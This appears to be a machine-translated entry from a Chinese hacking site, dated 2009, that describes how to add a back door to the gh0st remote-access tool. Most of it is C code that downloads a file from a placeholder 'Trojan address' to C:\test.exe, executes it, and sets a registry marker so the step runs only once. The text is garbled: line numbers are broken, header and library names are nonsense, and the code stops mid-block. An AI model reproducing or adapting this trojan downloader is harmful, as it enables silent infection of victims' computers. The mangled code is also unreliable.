gh0st plus the back door method-vulnerability warning-the black bar safety net

2009-10-04T00:00:00
ID MYHACK58:62200924902
Type myhack58
Reporter 佚名
Modified 2009-10-04T00:00:00

Description

Plus the back door methods: 1. Download the program 2. if the computer restart the above run

c code

view source

print[?] (<http://www.idying.cn/article.asp?id=73#about> "?" )

0 1.//------------------------------------

0 2. a# include&lt;windows. h&gt;

0 3.# include&lt;Vice. h&gt; //This can do not

0 4. a# include&lt;process. h&gt; //This can do not

0 5.# include&lt;Shellapi. h&gt; //This is the ShellExecute definition of

0 6.# pragma comment (lib,"With. lib") //this can also do not have the DLL can be used

0 7.int main()

0 8.{

0 9.URLDownloadToFile(NULL,"Trojan address","C:\test.exe",0,NULL);//下载 到 C:\test.exe`

1 0.ShellExecute(0,"open","c:\test.exe",NULL,NULL,SW_SHOW);//执行 test.exe`

1 1.return 0;

1 2.}

1 3.//---------------------- 2

1 4.HKEY to hKey;

1 5.DWORDdw;`

1 6.DWORDdwData = 0;`

1 7.if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\tw67waa",

1 8.0L,KEY_ALL_ACCESS,&hKey) != ERROR_SUCCESS)`

1 9.//If it exists it execute the following code `

2 0.{`

2 1.// RegCreateKey(HKEY_LOCAL_MACHINE, "SOFTWARE\tttjgf",&hKey);`

2 2.

2 3.

2 4.RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\tw67waa",0L,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dw);`

2 5.// RegSetValueEx(hKey, "hello", 0, REG_DWORD, (LPBYTE) &dwData,sizeof(DWORD));

2 6.

2 7.

2 8.// file();`

2 9.}`

3 0.else{or`

3 1.// file();

3 2.

3 3.